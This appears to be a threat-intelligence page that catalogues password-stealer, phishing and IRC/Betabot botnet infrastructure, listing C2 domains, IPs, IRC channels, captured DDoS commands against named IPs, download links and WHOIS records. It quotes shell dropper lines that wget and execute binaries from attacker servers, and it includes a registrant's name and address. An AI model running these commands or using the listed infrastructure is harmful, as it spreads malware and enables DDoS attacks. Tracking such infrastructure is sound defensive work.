KUKU406beta (Malware stealing passwords hosted in Germany Dortmund 1&1 Internet Ag)

This is spreading through torrents and cracks and looks like a password stealer. Domains and IPs used: makemegood24.com         213.165.83.176 e710e2.makemegood24.com 87.106.20.192 aaakemegood24.com         146.148.34.125 ww11.aaakemegood24.com 166.78.106.200 abakemegood24.com         74.208.153.9 acakemegood24.com         87.106.20.192 adakemegood24.com         213.165.83.176 aeakemegood24.com         74.208.164.166 afakemegood24.com perfectchoice1.com ...

185.61.138.235 (STD Botnet hosted in Ukraine Kiev Blazingfast Llc)

Another STD botnet found by abigail.

Server : 185.61.138.235
Port : 443
Channel : #secgod

DDOS Coming Up :

    <~Broken> >bot +std 70.127.120.174 80 30
    [STD]Hitting 70.127.120.174!
    [STD]Done hitting 70.127.120.174!
    <~Broken> >bot +stop
    Killing pid 13923.

Other url : http://93.174.93.45/f.sh

    #!/bin/sh
    cd /tmp && wget http://93.174.93.45/mosh && chmod +x mosh && ./mosh
    cd /tmp && wget http://93.174.93.45/mox64

...

191.235.178.122 (Modified Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)

Found by abigail.

Server : 191.235.178.122
Port : 443
Channel : #sh

DDOS Coming Up lol :

    <~Haze> >bot +std 172.56.41.67 80 120
    [STD]Hitting 172.56.41.67!
    [STD]Hitting 172.56.41.67!
    [STD]Done hitting 172.56.41.67!
    [STD]Done hitting 172.56.41.67!

You can download the bot here.

Other : http://5.152.206.162/getbinaries.sh

    #!/bin/sh
    # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
    # UPLOAD GETBINARIES.SH IN YOUR

...

jdsiwiqweiqwyreqwi.com (Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)

Domains used by the malware:

34324325kgkgfkgf.com
dsffdsk323721372131.com
fdshjfsh324332432.com
jdsiwiqweiqwyreqwi.com
80.242.123.208

HTTP Requests:

URI: http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php

DATA:

    POST /dffgbDFGvf465/YYf.php HTTP/1.0
    Host: jdsiwiqweiqwyreqwi.com
    Accept: */*
    Accept-Encoding: identity, *;q=0
    Accept-Language: en-US
    Content-Length: 272
    Content-Type: application/octet-stream
    Connection: close
    Content-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

samples: ...

Linux Botnet Hosted In blackunix.us

This is the bot used to scan for vulnerabilities: hxxp://pastebin.com/dEMULiQV

    Now talking in #botnets
    Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ]
    Topic By : [ uyap ]
    Modes On : [ #botnets ] [ +smntrMuk fcuked ]

The bot is hosted here: hxxp://visionafricamagazine.com/scripts/x.log

gki2mpdt3rsokbmv.onion (Irc botnet hosted on a Tor hidden service)

Server: gki2mpdt3rsokbmv.onion
Port: 6667
Channel: #channel

Oper:

    [wac] (wac@9bedb2.host): ac
    [wac] #channel
    [wac] lair.hell.net :Cerberus Server
    [wac] idle 00:00:18, signon: Tue May 13 18:24:47
    [wac] End of WHOIS list.

The owner must have used very old bot code to create this, as it fails to work properly on Windows 7 and higher.

Related md5s (Download sample from Malwr.com)

Ircbot: ...

sinsec.net (Betabot http botnet hosted by alibabahost.com)

Resolved sinsec.net to 37.221.170.96

Server: sinsec.net
Gate file: /turndown/order.php

Alternate domains:

divinestresser.info
radicalpkz.com
perp.pw
thefox.pw
uploadme.pw
perp.se

Domain info: sinsec.net

    Domain Name: SINSEC.NET
    Registry Domain ID: 1814650535_DOMAIN_NET-VRSN
    Registrar WHOIS Server: whois.enom.com
    Registrar URL: www.enom.com
    Updated Date: 2013-07-12 10:27:24Z
    Creation Date: 2013-07-12 17:27:00Z
    Registrar Registration Expiration Date: 2014-07-12 17:27:00Z
    Registrar: ENOM, INC.
    Registrar IANA ID: 48

...

api.wifi-update.biz (Betabot http botnet hosted by oneandone.net)

Resolved api.wifi-update.biz to 87.106.241.22

Server: api.wifi-update.biz
Gate file: /cdn/img.php

Alternate domains:

api-radio-def.de
api.lul.pw
api.tba.pw

Domain info: wifi-update.biz

    Domain Name: WIFI-UPDATE.BIZ
    Domain ID: D58641421-BIZ
    Sponsoring Registrar: BIZCN.COM, INC.
    Sponsoring Registrar IANA ID: 471
    Registrar URL (registration services): www.bizcn.com
    Domain Status: clientTransferProhibited
    Registrant ID: ORGEH90335606834
    Registrant Name: Erkki Hagstrom
    Registrant Organization: ErkkiHagstrom
    Registrant Address1: Gesterbyntie 51
    Registrant

...